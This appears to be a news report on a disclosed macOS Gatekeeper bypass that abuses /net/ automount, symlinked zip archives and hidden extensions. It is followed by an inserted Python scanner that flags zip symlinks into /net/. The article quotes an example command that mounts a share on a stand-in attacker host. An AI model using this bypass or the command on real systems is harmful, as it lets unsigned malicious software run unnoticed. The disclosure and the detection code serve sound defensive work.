
Security researcher Filippo Cavallarin has published a warning on his blog about a bug in macOS 10.14.5 that allows Gatekeeper's security checks to be bypassed completely. According to Cavallarin, he reported the flaw to Apple back in February of this year, but the company did not fix it in the latest update.

Gatekeeper was developed by Apple and first incorporated into its desktop operating system in 2012. It is a mechanism that prevents an application from running without the user's knowledge and consent: after you download an app, Gatekeeper automatically checks its code to verify that the software is properly signed by Apple.

In his blog post, Cavallarin notes that Gatekeeper, by default, treats both external storage and network shares as safe locations. Any application stored in one of these locations can therefore be launched without going through the Gatekeeper check. It is this behaviour that can be exploited to launch malicious software without the user's knowledge.

One element that makes the bypass possible is the automount feature, which lets users mount a network share automatically simply by referring to a path beginning with "/net/". As an example, Cavallarin cites the command "ls /net/evil-attacker.com/sharedfolder/", which causes the operating system to mount and list the contents of a "sharedfolder" folder on a remote host that may be under an attacker's control.

The way the attack works is demonstrated in the accompanying video.

Another factor is that if a zip archive containing a symlink pointing into the automount location is shared, Gatekeeper does not check it. The victim can therefore simply download the malicious archive and unzip it, which lets the attacker run virtually any software on the Mac without the user's knowledge. The Finder, which hides certain file extensions by default, also contributes to the vulnerability.
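As an added defensive example (not code from Cavallarin's write-up or from Apple), the following Python scanner inspects a zip archive for symlink entries whose target points under /net/, the automount namespace the article describes; the sample archive it builds and the host name example.invalid are constructed for the demonstration.

```python
import io
import stat
import zipfile
from typing import List, Tuple

# Automount prefix named in the write-up; Gatekeeper treats such shares as trusted.
AUTOMOUNT_PREFIX = "/net/"


def find_automount_symlinks(zip_bytes: bytes) -> List[Tuple[str, str]]:
    """Return (member name, link target) for every symlink in the archive
    whose target points into the /net/ automount namespace.

    zipfile does not expose symlinks directly: a symlink is a regular entry
    whose Unix mode (upper 16 bits of external_attr) has S_IFLNK set and
    whose data is the link target string.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            mode = info.external_attr >> 16
            if not stat.S_ISLNK(mode):
                continue
            target = zf.read(info).decode("utf-8", errors="replace")
            if target.startswith(AUTOMOUNT_PREFIX):
                hits.append((info.filename, target))
    return hits


def build_sample_zip(include_link: bool = True) -> bytes:
    """Constructed test input: an ordinary text file and, optionally, a symlink
    entry pointing into /net/ (example.invalid is a placeholder, not a real host)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("README.txt", "ordinary file\n")
        if include_link:
            link = zipfile.ZipInfo("Document")
            link.create_system = 3  # Unix: external_attr carries the mode bits
            link.external_attr = (stat.S_IFLNK | 0o777) << 16
            zf.writestr(link, "/net/example.invalid/sharedfolder/")
    return buf.getvalue()


if __name__ == "__main__":
    for name, target in find_automount_symlinks(build_sample_zip()):
        print(f"symlink {name!r} -> {target!r} resolves into the automount path")
```

The same check applies to any archive format that preserves symlinks; only the entry parsing differs.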

Cavallarin states on his blog that he brought the macOS vulnerability to Apple's attention on February 22 of this year. In mid-May, however, Apple stopped responding to him, so he decided to make the matter public.


Source: FCVL
